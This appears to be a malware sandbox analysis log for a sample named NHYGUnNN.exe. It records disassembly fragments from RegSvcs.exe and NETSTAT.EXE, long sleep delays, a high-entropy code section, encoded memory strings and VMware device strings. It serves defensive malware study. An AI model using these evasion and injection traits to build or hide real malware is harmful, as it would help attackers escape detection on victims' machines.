      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_00BDF9B2 push eax; ret
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_00BDD1CA push ebp; ret
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_00BDF965 push eax; ret
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_00BC423B push ds; iretd
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_00BDFA1C push eax; ret
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_00BC4212 push ds; iretd
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_00BC4254 push 793A76E7h; ret
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_00BD5B99 push edx; retf
      Source: initial sampleStatic PE information: section name: .text entropy: 7.879743437690199
      Source: C:\Users\user\Desktop\NHYGUnNN.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\NHYGUnNN.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\NHYGUnNN.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\NHYGUnNN.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\NHYGUnNN.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\NHYGUnNN.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\NHYGUnNN.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\NHYGUnNN.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\NHYGUnNN.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\NHYGUnNN.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\NHYGUnNN.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\NHYGUnNN.exe TID: 5188Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 4760Thread sleep time: -36000s >= -30000s
      Source: C:\Windows\explorer.exeLast function: Thread delayed
      Source: C:\Windows\SysWOW64\NETSTAT.EXELast function: Thread delayed
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013C5BA5 rdtsc
      Source: C:\Users\user\Desktop\NHYGUnNN.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeAPI coverage: 6.1 %
      Source: C:\Windows\SysWOW64\NETSTAT.EXEAPI coverage: 9.6 %
      Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess information queried: ProcessInformation
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_00BD2CA0 FindFirstFileW,FindNextFileW,FindClose,
      Source: C:\Users\user\Desktop\NHYGUnNN.exeThread delayed: delay time: 922337203685477
      Source: NHYGUnNN.exe, 00000000.00000002.240647032.0000012A3AB7D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %AtZhgFSZj9Dz1yuMzNKqbSEUnF+IaOYCOQ61mnNld0M4/l%phMpl%3Ts+
      Source: NHYGUnNN.exe, 00000000.00000002.239226226.0000012A39A02000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tZhgFSZj9Dz1yuMzNKqbSEUnF+IaOYCOQ61mnNld0M4/
      Source: explorer.exe, 00000002.00000000.296608102.00000000045B0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 00000002.00000000.303615769.00000000081DD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000^
      Source: explorer.exe, 00000002.00000000.279110893.0000000006710000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
      Source: explorer.exe, 00000002.00000000.282562714.00000000082B2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Prod_VMware_SATAi
      Source: NHYGUnNN.exe, 00000000.00000002.240917397.0000012A3ABFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %AtZhgFSZj9Dz1yuMzNKqbSEUnF+IaOYCOQ61mnNld0M4/VphMpV3Ts+
      Source: NHYGUnNN.exe, 00000000.00000002.241144747.0000012A3AC7E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %C30PR9jBAtZhgFSZj9Dz1yuMzNKqbSEUnF+IaOYCOQ61mnNld0M4/VphMpV3Ts+
      Source: explorer.exe, 00000002.00000000.252879418.0000000008304000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
      Source: NHYGUnNN.exe, 00000000.00000002.240357022.0000012A3AAF8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %AtZhgFSZj9Dz1yuMzNKqbSEUnF+IaOYCOQ61mnNld0M4/l%phMpl%3
      Source: NHYGUnNN.exe, 00000000.00000002.239851941.0000012A3AA71000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %tZhgFSZj9Dz1yuMzNKqbSEUnF+IaOYCOQ61mnNld0M4/l%phMpl%3
      Source: explorer.exe, 00000002.00000000.282562714.00000000082B2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
      Source: explorer.exe, 00000002.00000000.252366258.0000000008200000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>&
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013C5BA5 rdtsc
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132513A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132513A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01314120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01314120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01314120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01314120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01314120 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012F9100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012F9100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012F9100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012FC962 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012FB171 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012FB171 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131B944 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131B944 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013751BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013751BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013751BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013751BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013199BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013199BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013199BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013199BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013199BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013199BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013199BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013199BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013199BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013199BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013199BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013199BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013769A6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013261A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013261A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B49A4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B49A4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B49A4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B49A4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01322990 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131C182 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132A185 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012FB1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012FB1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012FB1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013841E8 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131A830 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131A830 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131A830 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131A830 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0130B02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0130B02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0130B02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0130B02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01377016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01377016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01377016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013C4015 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013C4015 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B2073 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013C1074 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01310050 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01310050 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132F0BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132F0BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132F0BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013220A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013220A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013220A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013220A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013220A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013220A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013390AF mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012F9080 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01373884 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01373884 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012F58EC mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012F40E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012F40E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012F40E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131B8E4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131B8E4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0138B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0138B8D0 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0138B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0138B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0138B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0138B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B131B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131A309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131A309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131A309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131A309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131A309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131A309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131A309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131A309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131A309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131A309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131A309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131A309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131A309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131A309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131A309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131A309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131A309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131A309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131A309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131A309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131A309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01323B7A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01323B7A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012FDB60 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013C8B58 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012FDB40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012FF358 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013C5BA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01324BAD mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01324BAD mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01324BAD mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132B390 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01322397 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B138A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132138B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132138B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132138B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013AD380 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01301B8F mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01301B8F mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013203E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013203E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013203E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013203E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013203E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013203E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131DBE9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013A23E3 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013A23E3 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013A23E3 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013753CA mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013753CA mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131B236 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131B236 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131B236 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131B236 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131B236 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131B236 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131A229 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131A229 mov eax, dword ptr fs:[00000030h]
